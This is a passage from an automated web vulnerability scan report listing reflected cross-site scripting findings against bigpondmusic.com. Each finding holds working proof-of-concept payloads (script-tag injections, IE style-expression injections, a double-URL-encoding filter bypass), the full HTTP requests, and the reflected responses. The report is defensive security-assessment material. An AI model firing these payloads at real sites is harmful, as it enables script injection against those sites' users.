...[SNIP]...

2.171. http://bigpondmusic.com/bargains/under11 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /bargains/under11

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85cfd"style%3d"x%3aexpression(alert(1))"bf04d3f3adc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 85cfd"style="x:expression(alert(1))"bf04d3f3adc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bargains/under11?85cfd"style%3d"x%3aexpression(alert(1))"bf04d3f3adc=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:16:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 231489


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Albums $11 and under - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/bargains/under11?85cfd"style="x:expression(alert(1))"bf04d3f3adc=1" />
...[SNIP]...

2.172. http://bigpondmusic.com/bargains/under13 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /bargains/under13

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 885a4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e316cb794c1e was submitted in the REST URL parameter 1. This input was echoed as 885a4"><script>alert(1)</script>316cb794c1e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /bargains885a4%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e316cb794c1e/under13 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:15:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87834


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/bargains885a4"><script>alert(1)</script>316cb794c1e/under13" />
...[SNIP]...

2.173. http://bigpondmusic.com/bargains/under13 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /bargains/under13

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 32294'%3bec059bf4529 was submitted in the REST URL parameter 1. This input was echoed as 32294';ec059bf4529 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bargains32294'%3bec059bf4529/under13 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:15:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87733


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
bpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'bargains32294';ec059bf4529';
   s.prop4 = 'under13';
   
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;
   s.prop11
...[SNIP]...

2.174. http://bigpondmusic.com/bargains/under13 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /bargains/under13

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2220%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5e45c0b35f9 was submitted in the REST URL parameter 2. This input was echoed as c2220"><script>alert(1)</script>5e45c0b35f9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /bargains/under13c2220%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5e45c0b35f9 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:15:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88112


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/bargains/under13c2220"><script>alert(1)</script>5e45c0b35f9" />
...[SNIP]...

2.175. http://bigpondmusic.com/bargains/under13 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /bargains/under13

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 51d00'%3b5edcbbcdac6 was submitted in the REST URL parameter 2. This input was echoed as 51d00';5edcbbcdac6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bargains/under1351d00'%3b5edcbbcdac6 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:15:24 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87802


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
sting.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'bargains';
   s.prop4 = 'under1351d00';5edcbbcdac6';
   
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;
   s.prop11 = 'Non-Registered-Musi
...[SNIP]...

2.176. http://bigpondmusic.com/bargains/under13 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /bargains/under13

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 874f6"style%3d"x%3aexpression(alert(1))"4e4f0e24928 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 874f6"style="x:expression(alert(1))"4e4f0e24928 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bargains/under13?874f6"style%3d"x%3aexpression(alert(1))"4e4f0e24928=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:14:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 229873


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Albums $13 and Under - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/bargains/under13?874f6"style="x:expression(alert(1))"4e4f0e24928=1" />
...[SNIP]...

2.177. http://bigpondmusic.com/bargains/under13/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /bargains/under13/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ce9c2'%3bab1ce357a08 was submitted in the REST URL parameter 1. This input was echoed as ce9c2';ab1ce357a08 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bargainsce9c2'%3bab1ce357a08/under13/ HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 02:48:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87802


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
bpmusicdev=localhost,testing.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'bargainsce9c2';ab1ce357a08';
   s.prop4 = 'under13';
   
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;
   s.prop11
...[SNIP]...

2.178. http://bigpondmusic.com/bargains/under13/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /bargains/under13/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 107c8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e43f02f38efd was submitted in the REST URL parameter 1. This input was echoed as 107c8"><script>alert(1)</script>43f02f38efd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /bargains107c8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e43f02f38efd/under13/ HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 02:48:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87834


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/bargains107c8"><script>alert(1)</script>43f02f38efd/under13/" />
...[SNIP]...

2.179. http://bigpondmusic.com/bargains/under13/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondmusic.com
Path:   /bargains/under13/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 38b64'%3b7b1bcc8a715 was submitted in the REST URL parameter 2. This input was echoed as 38b64';7b1bcc8a715 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bargains/under1338b64'%3b7b1bcc8a715/ HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 02:49:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 88037


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
sting.,staging.;telstraglobalprd,telstrabpbigpondprd,telstrabpmusicprd=bigpondmusic.com";
   s.prop1 = 'BP';
   s.prop2='Entertainment';
   s.prop3= 'Music';
   s.channel = 'bargains';
   s.prop4 = 'under1338b64';7b1bcc8a715';
   
   
   s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + ':' + s.prop4;
   
   s.hier1= s.prop1+ '|' + s.prop2+ '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;
   s.prop11 = 'Non-Registered-Musi
...[SNIP]...

2.180. http://bigpondmusic.com/bargains/under13/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /bargains/under13/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1ade%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e44d7c5038c9 was submitted in the REST URL parameter 2. This input was echoed as b1ade"><script>alert(1)</script>44d7c5038c9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /bargains/under13b1ade%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e44d7c5038c9/ HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 02:49:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 87904


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Site Index - Sitemap - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/bargains/under13b1ade"><script>alert(1)</script>44d7c5038c9/" />
...[SNIP]...

2.181. http://bigpondmusic.com/bargains/under13/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /bargains/under13/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b12d9"style%3d"x%3aexpression(alert(1))"52b563ab311 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b12d9"style="x:expression(alert(1))"52b563ab311 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bargains/under13/?b12d9"style%3d"x%3aexpression(alert(1))"52b563ab311=1 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 02:48:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 229841


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Albums $13 and Under - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/bargains/under13/?b12d9"style="x:expression(alert(1))"52b563ab311=1" />
...[SNIP]...

2.182. http://bigpondmusic.com/bargains/under13/ [ref parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /bargains/under13/

Issue detail

The value of the ref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29a14"style%3d"x%3aexpression(alert(1))"fe980943757 was submitted in the ref parameter. This input was echoed as 29a14"style="x:expression(alert(1))"fe980943757 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /bargains/under13/?ref=Net-Head-Music-Bargains29a14"style%3d"x%3aexpression(alert(1))"fe980943757 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 23 Nov 2010 03:12:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 229900


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Albums $13 and Under - BigPo
...[SNIP]...
<input type="hidden" name="parentUrl" value="http://bigpondmusic.com/bargains/under13/?ref=Net-Head-Music-Bargains29a14"style="x:expression(alert(1))"fe980943757" />
...[SNIP]...

2.183. http://bigpondmusic.com/bargains/under5 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondmusic.com
Path:   /bargains/under5

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8cf67%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2659a2ed60e was submitted in the REST URL parameter 1. This input was echoed as 8cf67"><script>alert(1)</script>2659a2ed60e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /bargains8cf67%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2659a2ed60e/under5 HTTP/1.1
Host: bigpondmusic.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Tue, 23 Nov 2010 03:15:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Handler: BigpondMusic
Pragma: no-cache
X-AspNetMvc-Version: 1.0
